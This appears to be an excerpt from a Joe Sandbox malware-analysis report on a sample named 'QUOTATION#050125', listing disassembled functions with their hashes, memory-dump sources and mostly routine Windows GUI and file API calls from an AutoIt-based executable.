Instruction ID: bf3ac96d616400caefb3941ea8b7191fc174ade5148f64351ee95e7055b5c2d3
Opcode Fuzzy Hash: 9084b4e029052128895840c3c28e948f6724b1d83b91d22a18243ac96ad56844
Instruction Fuzzy Hash: 065168A160C6056BEB38A6698C997BF278DDB33344F18091FD886D7382C61DDE06D35E

Function 004F2046 Relevance: 1.3, Strings: 1, Instructions: 72COMMON

Download Yara Rule

Strings

0&U, xrefs: 004F2053

Memory Dump Source

Source File: 00000000.00000002.2051345478.0000000000481000.00000020.00000001.01000000.00000003.sdmp, Offset: 00480000, based on PE: true

Associated: 00000000.00000002.2051317606.0000000000480000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051488447.000000000051C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051488447.0000000000542000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051576391.000000000054C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051607617.0000000000554000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_480000_QUOTATION#050125.jbxd

Similarity

API ID:
String ID: 0&U
API String ID: 0-66394845
Opcode ID: 0f7625f694ecc05f401de16bbe8c3896a4f6fdd4b7da1dd6962d4848b4fac593
Instruction ID: a3f2706d9624169f780a201e0f49032bc5b97787eb1f904ae5230d2000010cc9
Opcode Fuzzy Hash: 0f7625f694ecc05f401de16bbe8c3896a4f6fdd4b7da1dd6962d4848b4fac593
Instruction Fuzzy Hash: DC21E7322206158BDB28CF79C92367E73E5AB64310F14862EE5A7C33D0DE79A904DB84

Function 004B6DD9 Relevance: .6, Instructions: 637COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2051345478.0000000000481000.00000020.00000001.01000000.00000003.sdmp, Offset: 00480000, based on PE: true

Associated: 00000000.00000002.2051317606.0000000000480000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051488447.000000000051C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051488447.0000000000542000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051576391.000000000054C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051607617.0000000000554000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_480000_QUOTATION#050125.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 671cecf8f5f21c281a1587d4ff4d4ea042722f7eb778b973fba114990899f9bf
Instruction ID: 634e89df26586f68291c3ecaad71f17970c1b68692e7519298be9da9e4d02589
Opcode Fuzzy Hash: 671cecf8f5f21c281a1587d4ff4d4ea042722f7eb778b973fba114990899f9bf
Instruction Fuzzy Hash: D9320222D29F015DD7339634CC22336A689AFB73C5F15D737E81AB5AAAEB29C4835104

Function 0049CC39 Relevance: .6, Instructions: 635COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2051345478.0000000000481000.00000020.00000001.01000000.00000003.sdmp, Offset: 00480000, based on PE: true

Associated: 00000000.00000002.2051317606.0000000000480000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051488447.000000000051C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051488447.0000000000542000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051576391.000000000054C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051607617.0000000000554000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_480000_QUOTATION#050125.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 140380c3677637ab1448b90980eeadc6a111b2bee51be3e0bcf68872ac193b1d
Instruction ID: db1c35d65cf8c2c55755ce7bdf03610e160ad78722346940412728af5725c27c
Opcode Fuzzy Hash: 140380c3677637ab1448b90980eeadc6a111b2bee51be3e0bcf68872ac193b1d
Instruction Fuzzy Hash: 1932F331A401178BDF28CA69C4E46BE7FA2EB45304F28857BD44ADB391D63CDD82DB49

Function 004891C0 Relevance: .5, Instructions: 475COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2051345478.0000000000481000.00000020.00000001.01000000.00000003.sdmp, Offset: 00480000, based on PE: true

Associated: 00000000.00000002.2051317606.0000000000480000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051488447.000000000051C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051488447.0000000000542000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051576391.000000000054C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051607617.0000000000554000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_480000_QUOTATION#050125.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fe010297254e8b52566f7c2461ace55b439e7fbd17cc5b87a2fe61fc935c6406
Instruction ID: 0525a2e25bde1a8569f1357ed3e4fd184fdf14120848b53a3c75c28066b1ff96
Opcode Fuzzy Hash: fe010297254e8b52566f7c2461ace55b439e7fbd17cc5b87a2fe61fc935c6406
Instruction Fuzzy Hash: 0802C4B4A00205EBDF04DF55D881BAEB7B1FF54304F14856EE806DB291EB39AE15CB89

Function 004ACAA0 Relevance: .5, Instructions: 464COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2051345478.0000000000481000.00000020.00000001.01000000.00000003.sdmp, Offset: 00480000, based on PE: true

Associated: 00000000.00000002.2051317606.0000000000480000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051488447.000000000051C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051488447.0000000000542000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051576391.000000000054C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051607617.0000000000554000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_480000_QUOTATION#050125.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2fbdbeface8d474e65e3d830227d731b015bc4fe83c76ff0107a9da6199ccf29
Instruction ID: 7fe29cc9a23539bb22b436a4cddfed2044e640fad736a32bb0f64999c636f671
Opcode Fuzzy Hash: 2fbdbeface8d474e65e3d830227d731b015bc4fe83c76ff0107a9da6199ccf29
Instruction Fuzzy Hash: 94023D71E002199FDF54CFA9C9806AEFBF1EF59324F25416AE819E7380D735AD418B84

Function 004B9EEE Relevance: .3, Instructions: 294COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2051345478.0000000000481000.00000020.00000001.01000000.00000003.sdmp, Offset: 00480000, based on PE: true

Associated: 00000000.00000002.2051317606.0000000000480000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051488447.000000000051C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051488447.0000000000542000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051576391.000000000054C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051607617.0000000000554000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_480000_QUOTATION#050125.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4d5821cdfc10809476c159525fd4464b589daf048cc30ae94b98ca3a25470f9d
Instruction ID: 83a1386976a0e16fe533a68df3c65c89d3a1652699b499dfbe649ccb9d97bd24
Opcode Fuzzy Hash: 4d5821cdfc10809476c159525fd4464b589daf048cc30ae94b98ca3a25470f9d
Instruction Fuzzy Hash: 42B11420D2AF404DD32396398871336B75CAFBB6D5F91DB1BFC1674D22EB2686879140

Function 004A1C77 Relevance: .3, Instructions: 254COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2051345478.0000000000481000.00000020.00000001.01000000.00000003.sdmp, Offset: 00480000, based on PE: true

Associated: 00000000.00000002.2051317606.0000000000480000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051488447.000000000051C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051488447.0000000000542000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051576391.000000000054C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051607617.0000000000554000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_480000_QUOTATION#050125.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 93657a121f16255c59120ad0d08fdbba6372c273009ad596b4ecdf6e8f3c6909
Instruction ID: 456379435795a8126d2d4ba87ac463d9715a97d8a8cec1f6345978a30229c06a
Opcode Fuzzy Hash: 93657a121f16255c59120ad0d08fdbba6372c273009ad596b4ecdf6e8f3c6909
Instruction Fuzzy Hash: 2E9186721090E34ADB29423A857407FFFE15AA33B1B1A079FD4F2CA2E1FE189955D624

Function 004A1F32 Relevance: .2, Instructions: 244COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2051345478.0000000000481000.00000020.00000001.01000000.00000003.sdmp, Offset: 00480000, based on PE: true

Associated: 00000000.00000002.2051317606.0000000000480000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051488447.000000000051C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051488447.0000000000542000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051576391.000000000054C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051607617.0000000000554000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_480000_QUOTATION#050125.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 05e0b846b00456d0f1e87463b9d189974beed2fe63262d4392584e128a114ea2
Instruction ID: c3fdd0c075ddc3ff52971a2f342283970b274132f10e100f1fcaf39f4d0b824c
Opcode Fuzzy Hash: 05e0b846b00456d0f1e87463b9d189974beed2fe63262d4392584e128a114ea2
Instruction Fuzzy Hash: 9891727220D0E30EDB29423D857403FFEE15AB33A171A079FE4F2CA2D5EE688555E624

Function 004A19B0 Relevance: .2, Instructions: 240COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2051345478.0000000000481000.00000020.00000001.01000000.00000003.sdmp, Offset: 00480000, based on PE: true

Associated: 00000000.00000002.2051317606.0000000000480000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051488447.000000000051C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051488447.0000000000542000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051576391.000000000054C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051607617.0000000000554000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_480000_QUOTATION#050125.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 40101273f58913c3cb3bc7eb54df01d47b4121c3e67d19f11ec2cb23d33ea445
Instruction ID: 532a245330fdd78b19d6575891dd158d759d026fd1a25e4024cea5903b5c6029
Opcode Fuzzy Hash: 40101273f58913c3cb3bc7eb54df01d47b4121c3e67d19f11ec2cb23d33ea445
Instruction Fuzzy Hash: 599174722090E34ADB2D427A857403FFFE15AA33A1B1A079FD4F2CA2E1FD289555D624

Function 004A7A4A Relevance: .2, Instructions: 237COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2051345478.0000000000481000.00000020.00000001.01000000.00000003.sdmp, Offset: 00480000, based on PE: true

Associated: 00000000.00000002.2051317606.0000000000480000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051488447.000000000051C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051488447.0000000000542000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051576391.000000000054C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051607617.0000000000554000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_480000_QUOTATION#050125.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d763c0ed1a916498b82f1d91d191117f72f443e1d0423beeea4ba069ad43cbf6
Instruction ID: 85801f85849c5d03857ccec13ee0bb9f24593c0aa690801820a6e5256053e5fc
Opcode Fuzzy Hash: d763c0ed1a916498b82f1d91d191117f72f443e1d0423beeea4ba069ad43cbf6
Instruction Fuzzy Hash: 39615BB160870566DA349A288C95BBF3398DF73718F54091FE842DB382D61DAE42C76E

Function 004A7CA7 Relevance: .2, Instructions: 237COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2051345478.0000000000481000.00000020.00000001.01000000.00000003.sdmp, Offset: 00480000, based on PE: true

Associated: 00000000.00000002.2051317606.0000000000480000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051488447.000000000051C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051488447.0000000000542000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051576391.000000000054C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051607617.0000000000554000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_480000_QUOTATION#050125.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f3f4008f9fdc8558572ace74f0113e8b6753172fa2fc38a3a2129082cdf6a8b0
Instruction ID: d1e1bcc398647906f5bb8b3817ad4c635b18fa9dac210221deeb7f0cbe029149
Opcode Fuzzy Hash: f3f4008f9fdc8558572ace74f0113e8b6753172fa2fc38a3a2129082cdf6a8b0
Instruction Fuzzy Hash: AC61597160870956EE384A285C95BBF2398EF73744F14095FE943DB381EA1E9D43825E

Function 004A1706 Relevance: .2, Instructions: 232COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2051345478.0000000000481000.00000020.00000001.01000000.00000003.sdmp, Offset: 00480000, based on PE: true

Associated: 00000000.00000002.2051317606.0000000000480000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051488447.000000000051C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051488447.0000000000542000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051576391.000000000054C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051607617.0000000000554000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_480000_QUOTATION#050125.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 70da388f96bbbf26b230a155b4728740b34f0d100ea60ab2bbadb9d7d0befbf0
Instruction ID: 0b1fe313dab303e4773c19d79e6d1c050446be0a56e20eae027da202d972dbb0
Opcode Fuzzy Hash: 70da388f96bbbf26b230a155b4728740b34f0d100ea60ab2bbadb9d7d0befbf0
Instruction Fuzzy Hash: 8E81A6765080A30DDB6D4239853403FFFE55AA33A1B1A079FD4F2CA2E1EE1CC554D624

Function 01B2A050 Relevance: .1, Instructions: 92COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2053175010.0000000001B26000.00000040.00000020.00020000.00000000.sdmp, Offset: 01B26000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1b26000_QUOTATION#050125.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 424b499c86482d5e2cad33d2eb2b77d7085f14ac4781241b47b3debc7e1ef18c
Instruction ID: d8331b82d85a77f17b7f3937217d535206eb173d12521faabf48182f039ff90a
Opcode Fuzzy Hash: 424b499c86482d5e2cad33d2eb2b77d7085f14ac4781241b47b3debc7e1ef18c
Instruction Fuzzy Hash: EE41C271D1051CEBCF48CFADC991AAEBBF2AF88201F548299D516AB345D730AB41DB80

Function 01B29EE0 Relevance: .0, Instructions: 35COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2053175010.0000000001B26000.00000040.00000020.00020000.00000000.sdmp, Offset: 01B26000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1b26000_QUOTATION#050125.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6091d3ab8c142cd01bdaf95ad615aaddba634de501579065cef803e1d5150a63
Instruction ID: 2766760a3d77158b0b832314e400747665ba562b19a75be093c0dc37bbb4280c
Opcode Fuzzy Hash: 6091d3ab8c142cd01bdaf95ad615aaddba634de501579065cef803e1d5150a63
Instruction Fuzzy Hash: C1019278A01219EFCB88DF98C590DAEF7B5FB48314F6085D9E809A7341D730AE41DB80

Function 01B29F40 Relevance: .0, Instructions: 35COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2053175010.0000000001B26000.00000040.00000020.00020000.00000000.sdmp, Offset: 01B26000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1b26000_QUOTATION#050125.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2824983519b781728331ca74e43d8f1b114060d413125894b627f2317d3cf6f3
Instruction ID: 25d2cca6fb366c00066021a8ab2a941edc9868dad7c1ed714cb87c76a4d7619f
Opcode Fuzzy Hash: 2824983519b781728331ca74e43d8f1b114060d413125894b627f2317d3cf6f3
Instruction Fuzzy Hash: A5019674A01219EFCB88DF98C590DADF7B5FB48314F2085D9E819A7341D730AE41DB80

Function 01B28880 Relevance: .0, Instructions: 6COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2053175010.0000000001B26000.00000040.00000020.00020000.00000000.sdmp, Offset: 01B26000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1b26000_QUOTATION#050125.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e1f80ac41b4fc2d45690e214ca5193b9bf4f67450f61a2a701b7f1fb86cd8f4e
Instruction ID: 2052e7d0eb43af8a57a5c2d707c06396f1b84aee57587abda472ed480d51124b
Opcode Fuzzy Hash: e1f80ac41b4fc2d45690e214ca5193b9bf4f67450f61a2a701b7f1fb86cd8f4e
Instruction Fuzzy Hash: 1AB012310527488BC2118B89E008B1073ECA308E04F1000B0D40C07B01827874008D48

Function 00502ADE Relevance: 75.7, APIs: 39, Strings: 4, Instructions: 486filecommemoryCOMMON

Download Yara Rule

APIs

DeleteObject.GDI32(00000000), ref: 00502B30
DeleteObject.GDI32(00000000), ref: 00502B43
DestroyWindow.USER32 ref: 00502B52
GetDesktopWindow.USER32 ref: 00502B6D
GetWindowRect.USER32(00000000), ref: 00502B74
SetRect.USER32(?,00000000,00000000,00000007,00000002), ref: 00502CA3
AdjustWindowRectEx.USER32(?,88C00000,00000000,?), ref: 00502CB1
CreateWindowExW.USER32(?,AutoIt v3,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00502CF8
GetClientRect.USER32(00000000,?), ref: 00502D04
CreateWindowExW.USER32(00000000,static,00000000,5000000E,00000000,00000000,?,?,00000000,00000000,00000000), ref: 00502D40
CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00502D62
GetFileSize.KERNEL32(00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00502D75
GlobalAlloc.KERNEL32(00000002,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00502D80
GlobalLock.KERNEL32(00000000), ref: 00502D89
ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00502D98
GlobalUnlock.KERNEL32(00000000), ref: 00502DA1
CloseHandle.KERNEL32(00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00502DA8
GlobalFree.KERNEL32(00000000), ref: 00502DB3
CreateStreamOnHGlobal.OLE32(00000000,00000001,?,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00502DC5
OleLoadPicture.OLEAUT32(?,00000000,00000000,0051FC38,00000000), ref: 00502DDB
GlobalFree.KERNEL32(00000000), ref: 00502DEB
CopyImage.USER32(00000007,00000000,00000000,00000000,00002000), ref: 00502E11
SendMessageW.USER32(00000000,00000172,00000000,00000007), ref: 00502E30
SetWindowPos.USER32(00000000,00000000,00000000,00000000,?,?,00000020,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00502E52
ShowWindow.USER32(00000004,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 0050303F

Strings

static, xrefs: 00502D3A, 00502E91
AutoIt v3, xrefs: 00502CF2
, xrefs: 00502FC5
DISPLAY, xrefs: 00502EA2

Memory Dump Source

Source File: 00000000.00000002.2051345478.0000000000481000.00000020.00000001.01000000.00000003.sdmp, Offset: 00480000, based on PE: true

Associated: 00000000.00000002.2051317606.0000000000480000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051488447.000000000051C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051488447.0000000000542000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051576391.000000000054C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051607617.0000000000554000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_480000_QUOTATION#050125.jbxd

Similarity

API ID: Window$Global$CreateRect$File$DeleteFreeObject$AdjustAllocClientCloseCopyDesktopDestroyHandleImageLoadLockMessagePictureReadSendShowSizeStreamUnlock
String ID: $AutoIt v3$DISPLAY$static
API String ID: 2211948467-2373415609
Opcode ID: 89f9bb2515667104ab36ac352b53c78169fba635ab4f86ee67927c853e23588d
Instruction ID: f167b9d8f2a6a3509ac430cb2f6b4a043d139259dd89168f5d9fd732a7237eed
Opcode Fuzzy Hash: 89f9bb2515667104ab36ac352b53c78169fba635ab4f86ee67927c853e23588d
Instruction Fuzzy Hash: 84029971A40209AFDB14DFA4CC89EAE7FB9FB49714F008548F915AB2A1CB75ED04DB60

Function 005170D5 Relevance: 49.8, APIs: 33, Instructions: 273COMMON

Download Yara Rule

APIs

SetTextColor.GDI32(?,00000000), ref: 0051712F
GetSysColorBrush.USER32(0000000F), ref: 00517160
GetSysColor.USER32(0000000F), ref: 0051716C
SetBkColor.GDI32(?,000000FF), ref: 00517186
SelectObject.GDI32(?,?), ref: 00517195
InflateRect.USER32(?,000000FF,000000FF), ref: 005171C0
GetSysColor.USER32(00000010), ref: 005171C8
CreateSolidBrush.GDI32(00000000), ref: 005171CF
FrameRect.USER32(?,?,00000000), ref: 005171DE
DeleteObject.GDI32(00000000), ref: 005171E5
InflateRect.USER32(?,000000FE,000000FE), ref: 00517230
FillRect.USER32(?,?,?), ref: 00517262
GetWindowLongW.USER32(?,000000F0), ref: 00517284

Part of subcall function 005173E8: GetSysColor.USER32(00000012), ref: 00517421
Part of subcall function 005173E8: SetTextColor.GDI32(?,?), ref: 00517425
Part of subcall function 005173E8: GetSysColorBrush.USER32(0000000F), ref: 0051743B
Part of subcall function 005173E8: GetSysColor.USER32(0000000F), ref: 00517446
Part of subcall function 005173E8: GetSysColor.USER32(00000011), ref: 00517463
Part of subcall function 005173E8: CreatePen.GDI32(00000000,00000001,00743C00), ref: 00517471
Part of subcall function 005173E8: SelectObject.GDI32(?,00000000), ref: 00517482
Part of subcall function 005173E8: SetBkColor.GDI32(?,00000000), ref: 0051748B
Part of subcall function 005173E8: SelectObject.GDI32(?,?), ref: 00517498
Part of subcall function 005173E8: InflateRect.USER32(?,000000FF,000000FF), ref: 005174B7
Part of subcall function 005173E8: RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 005174CE
Part of subcall function 005173E8: GetWindowLongW.USER32(00000000,000000F0), ref: 005174DB

Memory Dump Source

Source File: 00000000.00000002.2051345478.0000000000481000.00000020.00000001.01000000.00000003.sdmp, Offset: 00480000, based on PE: true

Associated: 00000000.00000002.2051317606.0000000000480000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051488447.000000000051C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051488447.0000000000542000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051576391.000000000054C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051607617.0000000000554000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_480000_QUOTATION#050125.jbxd

Similarity

API ID: Color$Rect$Object$BrushInflateSelect$CreateLongTextWindow$DeleteFillFrameRoundSolid
String ID:
API String ID: 4124339563-0
Opcode ID: 644e09609ffcd642c0861f665412ad6cf54d212961327bb207890ce1325d22c1
Instruction ID: 06153d2f45567757ca01434540c1e78b485eb4479cb931ec0df36fe77c430c8f
Opcode Fuzzy Hash: 644e09609ffcd642c0861f665412ad6cf54d212961327bb207890ce1325d22c1
Instruction Fuzzy Hash: 95A1A072088305BFEB009F64DC48E9B7FB9FB58320F104A19F962961E0D772E989DB51

Function 00498D85 Relevance: 47.7, APIs: 26, Strings: 1, Instructions: 480windowCOMMON

Download Yara Rule

APIs

DestroyWindow.USER32(?,?), ref: 00498E14
SendMessageW.USER32(?,00001308,?,00000000), ref: 004D6AC5
ImageList_Remove.COMCTL32(?,000000FF,?), ref: 004D6AFE
MoveWindow.USER32(?,?,?,?,?,00000000), ref: 004D6F43

Part of subcall function 00498F62: InvalidateRect.USER32(?,00000000,00000001,?,?,?,00498BE8,?,00000000,?,?,?,?,00498BBA,00000000,?), ref: 00498FC5

SendMessageW.USER32(?,00001053), ref: 004D6F7F
SendMessageW.USER32(?,00001008,000000FF,00000000), ref: 004D6F96
ImageList_Destroy.COMCTL32(00000000,?), ref: 004D6FAC
ImageList_Destroy.COMCTL32(00000000,?), ref: 004D6FB7

Strings

0, xrefs: 004D6DCF

Memory Dump Source

Source File: 00000000.00000002.2051345478.0000000000481000.00000020.00000001.01000000.00000003.sdmp, Offset: 00480000, based on PE: true

Associated: 00000000.00000002.2051317606.0000000000480000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051488447.000000000051C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051488447.0000000000542000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051576391.000000000054C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051607617.0000000000554000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_480000_QUOTATION#050125.jbxd

Similarity

API ID: DestroyImageList_MessageSend$Window$InvalidateMoveRectRemove
String ID: 0
API String ID: 2760611726-4108050209
Opcode ID: 602309c76994833a394337f3d6eed159085be1dc2ed59b0e67b161ec5bb7dcee
Instruction ID: c411796454b1b2578e35cf36f180e088e341c150ebe1d2685d8aed613fdd24db
Opcode Fuzzy Hash: 602309c76994833a394337f3d6eed159085be1dc2ed59b0e67b161ec5bb7dcee
Instruction Fuzzy Hash: D71299302006119FDB21CF28C864BAABBF5BB55304F15846FE495CB361CB3AEC56DB99

Function 00502711 Relevance: 45.8, APIs: 22, Strings: 4, Instructions: 330windowCOMMON

Download Yara Rule

APIs

DestroyWindow.USER32(00000000), ref: 0050273E
SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 0050286A
SetRect.USER32(?,00000000,00000000,0000012C,?), ref: 005028A9
AdjustWindowRectEx.USER32(?,88C00000,00000000,00000008), ref: 005028B9
CreateWindowExW.USER32(00000008,AutoIt v3,?,88C00000,000000FF,?,?,?,00000000,00000000,00000000), ref: 00502900
GetClientRect.USER32(00000000,?), ref: 0050290C
CreateWindowExW.USER32(00000000,static,?,50000000,?,00000004,00000500,-00000017,00000000,00000000,00000000), ref: 00502955
CreateDCW.GDI32(DISPLAY,00000000,00000000,00000000), ref: 00502964
GetStockObject.GDI32(00000011), ref: 00502974
SelectObject.GDI32(00000000,00000000), ref: 00502978
GetTextFaceW.GDI32(00000000,00000040,?,?,50000000,?,00000004,00000500,-00000017,00000000,00000000,00000000,?,88C00000,000000FF,?), ref: 00502988
GetDeviceCaps.GDI32(00000000,0000005A), ref: 00502991
DeleteDC.GDI32(00000000), ref: 0050299A
CreateFontW.GDI32(00000000,00000000,00000000,00000000,00000258,00000000,00000000,00000000,00000001,00000004,00000000,00000002,00000000,?), ref: 005029C6
SendMessageW.USER32(00000030,00000000,00000001), ref: 005029DD
CreateWindowExW.USER32(00000200,msctls_progress32,00000000,50000001,?,-0000001D,00000104,00000014,00000000,00000000,00000000), ref: 00502A1D
SendMessageW.USER32(00000000,00000401,00000000,00640000), ref: 00502A31
SendMessageW.USER32(00000404,00000001,00000000), ref: 00502A42
